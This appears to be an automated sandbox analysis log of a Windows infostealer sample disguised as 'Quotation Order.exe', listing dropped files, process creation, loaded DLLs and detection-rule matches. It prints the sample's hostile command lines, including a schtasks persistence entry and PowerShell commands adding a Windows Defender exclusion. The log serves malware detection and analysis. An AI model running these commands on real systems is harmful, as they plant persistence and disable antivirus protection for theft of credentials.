                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C1918DC052_2_00007FF7C1918DC0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C191460052_2_00007FF7C1914600
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C1924D2552_2_00007FF7C1924D25
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C191252852_2_00007FF7C1912528
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C191BD3052_2_00007FF7C191BD30
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C191C11152_2_00007FF7C191C111
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C19259C952_2_00007FF7C19259C9
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C192597D52_2_00007FF7C192597D
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C19194D852_2_00007FF7C19194D8
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C1918EF052_2_00007FF7C1918EF0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C1924DB452_2_00007FF7C1924DB4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0144B4C856_2_0144B4C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_01444AD856_2_01444AD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0144EF0056_2_0144EF00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_01443EC056_2_01443EC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0144420856_2_01444208
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0622C48056_2_0622C480
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0622AF1456_2_0622AF14
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0622E29056_2_0622E290
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0622AF0856_2_0622AF08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0622ABF856_2_0622ABF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_06247D7856_2_06247D78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_062455A856_2_062455A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_062465E856_2_062465E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0624B22856_2_0624B228
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0624236056_2_06242360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0624C17056_2_0624C170
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0624769856_2_06247698
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_06245CF056_2_06245CF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0624E39856_2_0624E398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0624004056_2_06240040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0624000656_2_06240006
Source: C:\Windows\System32\conhost.exe; Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 428 -p 8072 -ip 8072
Source: Quotation Order.exe; Static PE information: No import functions for PE file found
Source: svchost.exe.0.dr; Static PE information: No import functions for PE file found
Source: Quotation Order.exe, 00000000.00000000.1254895494.00000259E990E000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: OriginalFilenameAluderopolikodiquxeko2 vs Quotation Order.exe
Source: Quotation Order.exe; Binary or memory string: OriginalFilenameAluderopolikodiquxeko2 vs Quotation Order.exe
                    Source: 17.2.svchost.exe.1fc9f239308.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 17.2.svchost.exe.1fc9f1fd6c0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 26.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 17.2.svchost.exe.1fc9f1fd6c0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: Quotation Order.exe, -----.cs; Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: svchost.exe.0.dr, -----.cs; Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, G39cBQ.cs; Cryptographic APIs: 'TransformFinalBlock'
Source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, G39cBQ.cs; Cryptographic APIs: 'TransformFinalBlock'
Source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, sDtvQjPGfa.cs; Cryptographic APIs: 'TransformFinalBlock'
Source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, sDtvQjPGfa.cs; Cryptographic APIs: 'TransformFinalBlock'
Source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, sDtvQjPGfa.cs; Cryptographic APIs: 'TransformFinalBlock'
Source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, sDtvQjPGfa.cs; Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe, 0000000F.00000002.1481132072.00000153BE8F2000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbxko
Source: classification engine; Classification label: mal100.troj.spyw.expl.evad.winEXE@85/46@2/2
Source: C:\Users\user\Desktop\Quotation Order.exe; File created: C:\Users\user\AppData\Roaming\svchost.exe
                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8164
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4444:120:WilError_03
                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8072
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7412
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5748:120:WilError_03
Source: C:\Users\user\Desktop\Quotation Order.exe; File created: C:\Users\user\AppData\Local\Temp\tmp25B.tmp
Source: C:\Users\user\Desktop\Quotation Order.exe; Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp25B.tmp.bat""
Source: Quotation Order.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Quotation Order.exe; Static file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Quotation Order.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Quotation Order.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Quotation Order.exe | ReversingLabs: Detection: 31%
Source: Quotation Order.exe | Virustotal: Detection: 28%
Source: C:\Users\user\Desktop\Quotation Order.exe | File read: C:\Users\user\Desktop\Quotation Order.exe
Source: unknown | Process created: C:\Users\user\Desktop\Quotation Order.exe "C:\Users\user\Desktop\Quotation Order.exe"
Source: C:\Users\user\Desktop\Quotation Order.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
Source: C:\Users\user\Desktop\Quotation Order.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Quotation Order.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp25B.tmp.bat""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 3
Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 428 -p 8072 -ip 8072
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8072 -s 1276
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 212 -p 8164 -ip 8164
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8164 -s 1688
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 552 -p 7412 -ip 7412
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7412 -s 1648
Source: unknown | Process created: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe "C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe"
Source: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Users\user\Desktop\Quotation Order.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
Source: C:\Users\user\Desktop\Quotation Order.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp25B.tmp.bat""
Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 428 -p 8072 -ip 8072
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8072 -s 1276
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 212 -p 8164 -ip 8164
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8164 -s 1688
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 552 -p 7412 -ip 7412
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7412 -s 1648
Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
Source: C:\Windows\System32\WerFault.exe | Process created: unknown unknown
Source: C:\Windows\System32\WerFault.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\WerFault.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Quotation Order.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: moshost.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mapsbtsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mosstorage.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mapconfiguration.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: storsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: devobj.dll
